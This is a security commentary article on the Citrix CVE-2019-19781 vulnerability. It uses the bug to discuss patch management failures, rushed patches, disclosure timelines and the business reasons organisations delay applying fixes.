What can the Citrix bug teach us about patch management and disclosure protocols?


The Citrix bug (CVE-2019-19781) was discovered in mid-December by researchers and, even though the vendor promptly released a patch, it gave criminals access to victims’ local networks, allowing them to run code via directory traversal.

This vulnerability gained attention because of the severity of the exploit, but also because it provides insight on the challenges with the approach that most enterprises have to patch management, as well as the problems with disclosure protocols.

When alerted of the vulnerability, Citrix developed and released a series of mitigation measures within a few weeks.

A full patch, however, was made available only towards the end of January, when many organisations had already been exposed for days, and when a proof of concept for the exploitation of the bug had already been published online.

It was also identified that in some situations the original fix did not actually work, giving organisations a false sense of security.

According to Bulletproof’s annual report, public facing services are discovered and attacked within 32ms of going live, and as many as 50% of critical flaws are linked to bad patch management, leaving such a critical and commonly found vulnerability exposed for even a few days had serious consequences.

Not only was the bug linked to the NotRobin backdoor, which targets Citrix/NetScaler appliances vulnerable to CVE-2019-19781, but it highlighted how the current disclosure protocols may be placing unnecessary pressure on vendors to disclose the flaw and release a patch hastily.

Does ethical disclosure put pressure on vendors to release patches too soon?

Theoretically, disclosure timeframes and protocols are in place to ensure that vendors will develop a patch in a timely manner, and that organisations and individuals are not exposed to unnecessary risks.

This makes sense: if a vulnerability is discovered by researchers, it is likely that a threat actor would have the capability of finding it, too. By forcing vendors to act swiftly, this should reduce the timeframe of exposure.

However, each case is very different, and pressuring vendors to release a fix is not always beneficial.

If patches are rushed, there can be mistakes in how they are developed or, more commonly, compatibility issues, which may prompt organisation to hold off applying such patch, ultimately reducing the effectiveness of such strict protocols.

Do organisations really patch when they should?

It may seem reasonable to expect that enterprises – especially after the WannaCry attack highlighted the price of leaving a vulnerability unpatched – will immediately step up and apply the fixes.

But this doesn’t happen for a number of reasons, meaning that many systems remain unpatched long after when proof-of-concept demonstrations of how to exploit a specific CVE are made publicly available.

In fact, a quick, 10-minute scan conducted in February, well after the patch was released and the exploit became publicly available, returned 59 Citrix unpatched systems, all of which could potentially have been already compromised.

It is safe to assume that a more thorough scan would have returned many more.

Cyber security often comes second

One of the reasons why so many companies fail to apply patches when they should is the impact downtime has on business operations.

Having business critical systems taken offline for the time required for fixes to be installed can cause a revenue loss that IT security teams need to justify to the board.

But postponing the application of security patches to avoid the disruption to business operations brings only a short-termed advantage.

The revenue loss that may come from a security compromise will almost certainly outweigh the cost involved with protecting the business, its data and its customers from a cyberattack.

Whether it’s a ransomware that halts operations altogether, or a compromise to sensitive customer information resulting in sanctions and reputational damage, prioritising security is a longer-term investment that will pay off.

Going back to basics

Organisations still fail to get the basics of security right, and the current vulnerability disclosure protocols do not account for that.

As many as 1 in 5 companies where a penetration test is performed turn out to have a critical flaw in their infrastructure or application in need of immediate remediation, and half of those are due to bad patch management.

This is due to the reasons outlined above, but there are many more, among which are the lack of resources – human and monetary – necessary to stay on top of security.

The best thing we can hope for is for organisations to learn from past mistakes, and start approaching security as something that should be an integral part of its business model.

A better patch management and following best practices – essentially, thinking security and privacy by design – may seem like a monumental thing to put in place.

But when we think about security as one of our objectives, rather than something to bolster on top of operations, ultimately both the business and its customers will benefit.



Source link